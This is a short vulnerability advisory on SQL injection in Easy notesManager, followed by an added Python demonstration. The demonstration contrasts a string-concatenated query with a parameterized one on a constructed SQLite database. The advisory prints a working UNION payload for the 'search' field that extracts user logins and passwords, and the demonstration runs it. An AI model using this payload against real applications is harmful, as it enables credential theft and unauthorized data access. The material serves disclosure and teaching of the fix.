source: https://www.securityfocus.com/bid/20803/info
Easy notesManager is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Supplying the following to the 'search' field will return a list of all users and passwords:
dontcare')) union select 0,login,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from users --
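
The following is an added example, not code from the advisory or from Easy notesManager: it runs the search string quoted above against a string-concatenated query and against a parameterized one, to show why binding the 'search' value as data closes the hole. The SQLite schema, the query text, the sample rows and all function names are assumptions; the only things taken from the page are the payload and the fact that it closes two parentheses and needs a matching column count.

```python
import sqlite3

# Search string quoted in the advisory above.
PAYLOAD = "dontcare')) union select 0,login,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from users -- "

# UNION only works when both SELECTs have the same number of columns, so the
# payload's select list tells us how wide the application's query must be.
NCOLS = PAYLOAD.split("select ")[1].split(" from")[0].count(",") + 1

def make_db():
    """Constructed schema: a notes table NCOLS wide and a users table."""
    db = sqlite3.connect(":memory:")
    filler = ", ".join(f"f{i} INTEGER DEFAULT 0" for i in range(NCOLS - 3))
    db.execute(f"CREATE TABLE notes (id INTEGER, title TEXT, body TEXT, {filler})")
    db.execute("CREATE TABLE users (login TEXT, password TEXT)")
    db.execute("INSERT INTO notes (id, title, body) VALUES (1, 'groceries', 'milk')")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def search_concatenated(db, term):
    """Vulnerable pattern: the search term becomes part of the SQL text."""
    sql = "SELECT * FROM notes WHERE ((title LIKE '%" + term + "%'))"
    return db.execute(sql).fetchall()

def search_parameterized(db, term):
    """Hardened pattern: the term is bound as a value and never parsed as SQL.
    (% and _ in the term still act as LIKE wildcards, which is not injection.)"""
    sql = "SELECT * FROM notes WHERE ((title LIKE '%' || ? || '%'))"
    return db.execute(sql, (term,)).fetchall()

def title_body(rows):
    """Project the two text columns that the payload maps login/password onto."""
    return [(r[1], r[2]) for r in rows]

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", title_body(search_concatenated(db, PAYLOAD)))
    print("parameterized:", title_body(search_parameterized(db, PAYLOAD)))
    print("normal search:", title_body(search_parameterized(db, "groc")))
```

With the bound parameter the quote and parentheses in the search string are matched literally against note titles, so the query returns no rows instead of the contents of the users table.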